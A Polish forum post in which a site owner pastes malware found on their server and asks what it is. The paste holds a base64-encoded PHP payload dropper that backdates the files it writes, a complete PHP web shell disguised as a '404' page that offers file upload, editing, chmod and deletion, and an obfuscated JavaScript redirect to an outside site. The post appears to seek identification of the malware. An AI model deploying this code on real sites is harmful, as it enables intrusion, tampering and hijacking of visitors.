CddOwokYmFzZV9sb2NhbF9wYXRoID0gR2V0RG9jUm9vdCgpOwoKaWYgKCEoJGJhc2VfbG9jYWxfcGF0aF90aW1lID0gQHN0YXQoJGJhc2VfbG9jYWxfcGF0aC4iLy5odGFjY2VzcyIpKSkKewogICAgaWYgKCEoJGJhc2VfbG9jYWxfcGF0aF90aW1lID0gQHN0YXQoJGJhc2VfbG9jYWxfcGF0aC4iL2luZGV4LnBocCIpKSkKICAgIHsKICAgICAgICBpZiAoISgkYmFzZV9sb2NhbF9wYXRoX3RpbWUgPSBAc3RhdCgkYmFzZV9sb2NhbF9wYXRoLiIvaW5kZXguaHRtbCIpKSkKICAgICAgICB7CiAgICAgICAgICAgIGlmICghKCRiYXNlX2xvY2FsX3BhdGhfdGltZSA9IEBzdGF0KCRiYXNlX2xvY2FsX3BhdGguIi8uLiIpKSkKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgaWYgKCEoJGJhc2VfbG9jYWxfcGF0aF90aW1lID0gQHN0YXQoJGJhc2VfbG9jYWxfcGF0aCkpKQogICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICRiYXNlX2xvY2FsX3BhdGhfdGltZSA9IEFycmF5KCk7CiAgICAgICAgICAgICAgICAgICAgJGJhc2VfbG9jYWxfcGF0aF90aW1lWydtdGltZSddID0gdGltZSgpOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgfQogICAgfQp9CgokYmFzZV9sb2NhbF9wYXRoX3RpbWUgPSAkYmFzZV9sb2NhbF9wYXRoX3RpbWVbJ210aW1lJ107CgokZGlyX2xpc3Rfd3JpdGFibGUgPSBHZXRXcml0YWJsZURpcnMoKTsKCmlmIChjb3VudCgkZGlyX2xpc3Rfd3JpdGFibGUpID09IDApCnsKICAgIGVjaG8gIlVSTCNTVEFUVVNfVU5XUklUQUJMRSI7CiAgICBleGl0KCk7Cn0KCnVzb3J0KCRkaXJfbGlzdF93cml0YWJsZSwgJ2NvbXBhcmVyJyk7ICMgc29ydCBkaXJlY3RvcnkgYnkgbGVuCgokbGlzdF93cml0YWJsZSA9IEFycmF5KCk7CiRsaXN0X3dyaXRhYmxlW10gPSAkZGlyX2xpc3Rfd3JpdGFibGVbMF07CiRsaXN0X3dyaXRhYmxlW10gPSAkZGlyX2xpc3Rfd3JpdGFibGVbcmFuZCgwLHNpemVvZigkZGlyX2xpc3Rfd3JpdGFibGUpKV07CiRnb29kID0gRkFMU0U7CiRnb29kX2NvdW50ZXIgPSAwOwojIHRyeSB0byB1cGxvYWQKJG1heF90cnllcyA9IHN0cmxlbigkcGF5bG9hZF9uYW1lKSA9PSAwID8gNSA6IDE7CmZvcmVhY2ggKCRsaXN0X3dyaXRhYmxlIGFzICRjdXJyZW50X2RpcikKewogICAgLy8gaWYgcGF5bG9hZCBuYW1lIGlzIHNldCwgbm8gbW9yZSBvbmUgdHJ5IHRvIHVwbG9hZCBvbiBjdXJyZW50IGRpcgogICAgLy9mb3IgKCRpPTA7ICRpIDwgJG1heF90cnllczsgJGkrKykKICAgIHsKICAgICAgICBpZiAoc3RybGVuKCRwYXlsb2FkX25hbWUpID09IDApCiAgICAgICAgewogICAgICAgICAgICAkdGVtcF9wYXlsb2FkX25hbWUgPSBnZW5lcmF0ZVJhbmRvbVN0cmluZygpOwogICAgICAgIH0KICAgICAgICBlbHNlCiAgICAgICAgewogICAgICAgICAgICAkdGVtcF9wYXlsb2FkX25hbWUgPSAkcGF5bG9hZF9uYW1lOwogICAgICAgIH0KCiAgICAgICAgJGZ1bGxfcGF5bG9hZF9uYW1lID0gJGN1cnJlbnRfZGlyIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICR0ZW1wX3BheWxvYWRfbmFtZTsKCiAgICAgICAgJHVyaV9wYXRoID0gR2V0UGF0aERpZmYoJGJhc2VfbG9jYWxfcGF0aCwgJGZ1bGxfcGF5bG9hZF9uYW1lKTsKICAgICAgICBpZiAoc3RycG9zKCR1cmlfcGF0aCwgJHRlbXBfcGF5bG9hZF9uYW1lKSA9PT0gZmFsc2UpCiAgICAgICAgewogICAgICAgICAgICAkdXJpX3BhdGggPSAkdXJpX3BhdGggLiAiLyIgIC4gJHRlbXBfcGF5bG9hZF9uYW1lOwogICAgICAgIH0KICAgICAgICAkZnVsbF91cmkgPSAkYmFzZV93d3dfcGF0aCAuIChzdHJwb3MoJHVyaV9wYXRoLCAiLyIpID09IDAgPyAkdXJpX3BhdGggOiAiLyIuJHVyaV9wYXRoKTsKCiAgICAgICAgaWYgKFdyaXRlUGF5bG9hZCgkZnVsbF9wYXlsb2FkX25hbWUsICRwYXlsb2FkX2ZpbGUpKQogICAgICAgIHsKICAgICAgICAgICAgdG91Y2goJGZ1bGxfcGF5bG9hZF9uYW1lLCAkYmFzZV9sb2NhbF9wYXRoX3RpbWUpOyAvLyBzZXQgbGFzdCBtb2RpZmljYXRpb24gdGltZSBhcyByb290IGZvbGRlcgogICAgICAgICAgICBjaG1vZCgkZnVsbF9wYXlsb2FkX25hbWUsIDA3NTUpOwogICAgICAgICAgICBlY2hvICJVUkwjaHR0cDovLyIgLiAkZnVsbF91cmkgLiBQSFBfRU9MOwogICAgICAgICAgICAkZ29vZD1UUlVFOwogICAgICAgICAgICAkZ29vZF9jb3VudGVyKys7CiAgICAgICAgICAgIGlmICgkZ29vZF9jb3VudGVyID4xKQogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAvL3VubGluaygiZGZhb25mcGZrd2cucGhwIik7CiAgICAgICAgICAgICAgICBlY2hvICIjQ0NDVVJMIjsKICAgICAgICAgICAgICAgIGV4aXQoKTsKICAgICAgICAgICAgfQogICAgICAgIH0KICAgIH0KfQppZighJGdvb2QpCiAgICBlY2hvICJVUkwjU1RBVFVTX0NBTlRVUExPQUQjQ0NDVVJMIjsKZWNobyAiI0NDQ1VSTCI7Ci8vdW5saW5rKCJkZmFvbmZwZmt3Zy5waHAiKTsKZXhpdCgpOw=='));

seter.php.suspected

<?php
set_time_limit(0);
error_reporting(0);

if(get_magic_quotes_gpc()){
    foreach($_POST as $key=>$value){
        $_POST[$key] = stripslashes($value);
    }
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>404-server!!</title>
<style>
body{
    font-family: "Racing Sans One", cursive;
    background-color: #e6e6e6;
    text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
    background-color: #636263;
    text-shadow:0px 0px 10px #fff;
}
#content .first{
    background-color: silver;
}
#content .first:hover{
    background-color: silver;
    text-shadow:0px 0px 1px #757575;
}
table{
    border: 1px #000000 dotted;
}
H1{
    font-family: "Rye", cursive;
}
a{
    color: #000;
    text-decoration: none;
}
a:hover{
    color: #fff;
    text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
    border: 1px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center>config root man</center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Current Path : ';
if(isset($_GET['path'])){
    $path = $_GET['path'];   
}else{
    $path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
    if($pat == '' && $id == 0){
        $a = true;
        echo '<a href="?path=/">/</a>';
        continue;
    }
    if($pat == '') continue;
    echo '<a href="?path=';
    for($i=0;$i<=$id;$i++){
        echo "$paths[$i]";
        if($i != $id) echo "/";
    }
    echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
        echo '<font color="green">File Upload Done.</font><br />';
    }else{
        echo '<font color="red">File Upload Error.</font><br />';
    }
}
echo '<b><br>'.php_uname().'<br></b>';
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
    echo "<tr><td>Current File : ";
    echo $_GET['filesrc'];
    echo '</tr></td></table><br />';
    echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
    if($_POST['opt'] == 'chmod'){
        if(isset($_POST['perm'])){
            if(chmod($_POST['path'],$_POST['perm'])){
                echo '<font color="green">Change Permission Done.</font><br />';
            }else{
                echo '<font color="red">Change Permission Error.</font><br />';
            }
        }
        echo '<form method="POST">
        Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="chmod">
        <input type="submit" value="Go" />
        </form>';
    }elseif($_POST['opt'] == 'rename'){
        if(isset($_POST['newname'])){
            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
                echo '<font color="green">Change Name Done.</font><br />';
            }else{
                echo '<font color="red">Change Name Error.</font><br />';
            }
            $_POST['name'] = $_POST['newname'];
        }
        echo '<form method="POST">
        New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="rename">
        <input type="submit" value="Go" />
        </form>';
    }elseif($_POST['opt'] == 'edit'){
        if(isset($_POST['src'])){
            $fp = fopen($_POST['path'],'w');
            if(fwrite($fp,$_POST['src'])){
                echo '<font color="green">Edit File Done.</font><br />';
            }else{
                echo '<font color="red">Edit File Error.</font><br />';
            }
            fclose($fp);
        }
        echo '<form method="POST">
        <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="edit">
        <input type="submit" value="Go" />
        </form>';
    }
    echo '</center>';
}else{
    echo '</table><br /><center>';
    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
        if($_POST['type'] == 'dir'){
            if(rmdir($_POST['path'])){
                echo '<font color="green">Delete Dir Done.</font><br />';
            }else{
                echo '<font color="red">Delete Dir Error.</font><br />';
            }
        }elseif($_POST['type'] == 'file'){
            if(unlink($_POST['path'])){
                echo '<font color="green">Delete File Done.</font><br />';
            }else{
                echo '<font color="red">Delete File Error.</font><br />';
            }
        }
    }
    echo '</center>';
    $scandir = scandir($path);
    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
    <tr class="first">
        <td><center>Name</center></td>
        <td><center>Size</center></td>
        <td><center>Permissions</center></td>
        <td><center>Options</center></td>
    </tr>';

    foreach($scandir as $dir){
        if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
        echo "<tr>
        <td><a href=\"?path=$path/$dir\">$dir</a></td>
        <td><center>--</center></td>
        <td><center>";
        if(is_writable("$path/$dir")) echo '<font color="green">';
        elseif(!is_readable("$path/$dir")) echo '<font color="red">';
        echo perms("$path/$dir");
        if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
        
        echo "</center></td>
        <td><center><form method=\"POST\" action=\"?option&path=$path\">
        <select name=\"opt\">
	    <option value=\"\"></option>
        <option value=\"delete\">Delete</option>
        <option value=\"chmod\">Chmod</option>
        <option value=\"rename\">Rename</option>
        </select>
        <input type=\"hidden\" name=\"type\" value=\"dir\">
        <input type=\"hidden\" name=\"name\" value=\"$dir\">
        <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
        <input type=\"submit\" value=\">\" />
        </form></center></td>
        </tr>";
    }
    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
    foreach($scandir as $file){
        if(!is_file("$path/$file")) continue;
        $size = filesize("$path/$file")/1024;
        $size = round($size,3);
        if($size >= 1024){
            $size = round($size/1024,2).' MB';
        }else{
            $size = $size.' KB';
        }

        echo "<tr>
        <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
        <td><center>".$size."</center></td>
        <td><center>";
        if(is_writable("$path/$file")) echo '<font color="green">';
        elseif(!is_readable("$path/$file")) echo '<font color="red">';
        echo perms("$path/$file");
        if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
        echo "</center></td>
        <td><center><form method=\"POST\" action=\"?option&path=$path\">
        <select name=\"opt\">
	    <option value=\"\"></option>
        <option value=\"delete\">Delete</option>
        <option value=\"chmod\">Chmod</option>
        <option value=\"rename\">Rename</option>
        <option value=\"edit\">Edit</option>
        </select>
        <input type=\"hidden\" name=\"type\" value=\"file\">
        <input type=\"hidden\" name=\"name\" value=\"$file\">
        <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
        <input type=\"submit\" value=\">\" />
        </form></center></td>
        </tr>";
    }
    echo '</table>
    </div>';
}
echo '<br />Man Man <br />
</BODY>
</HTML>';
function perms($file){
    $perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
    // Socket
    $info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
    // Symbolic Link
    $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
    // Regular
    $info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
    // Block special
    $info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
    // Directory
    $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
    // Character special
    $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
    // FIFO pipe
    $info = 'p';
} else {
    // Unknown
    $info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));

    return $info;
}
?>
0

Zmieniłem z .php.suspected na php i ta da:
screenshot-20190701142440.png

Miał dostęp jednak do wszystkich plików!
screenshot-20190701142556.png

Czy ktoś wie co to za oprogramowanie? Nie ma żadnych informacji w internecie, chyba autorskie.

edit:
to wszystko niestety, reszta plików się powtarza, albo kilka plików html bez znaczenia

<html>
<head>
<title>athletic32475 Inheritance wears untowardness.</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
</head>
<body>
<script type="text/javascript">

affrightd();

function sunshinea(stirrupsi)
{
	return 3;
}

function sunshinee(asunshinee)
{
	return String.fromCharCode(asunshinee);
}

function affrightd()
{
	setTimeout(applyc(),1034);
}

function scannd(seemliness)
{
	seeking = seeking + seeking;
}

function applyc()
{
	aapplyc = sunshinea();
	bapplyc = [122,108,113,103,114,122,49,119,114,115,49,111,114,102,100,119,108,114,113,49,107,117,104,105,64,42,107,119,119,115,61,50,50,115,117,108,121,100,119,104,118,100,105,104,104,118,107,114,115,49,118,120,42,62];

	return stirrupsb(aapplyc,bapplyc);
}

function stirrupsb(astirrupsb,bstirrupsb)
{
	cstirrupsb = "";

	for (dstirrupsb = 0; dstirrupsb < bstirrupsb.length; dstirrupsb++)
	{
		estirrupsb = bstirrupsb[dstirrupsb];
		fstirrupsb = estirrupsb - astirrupsb;
		gstirrupsb = sunshinee(fstirrupsb);
		cstirrupsb = cstirrupsb + gstirrupsb;
	}

	return cstirrupsb;
}

</script>
</body>
</html>

1 użytkowników online, w tym zalogowanych: 0, gości: 1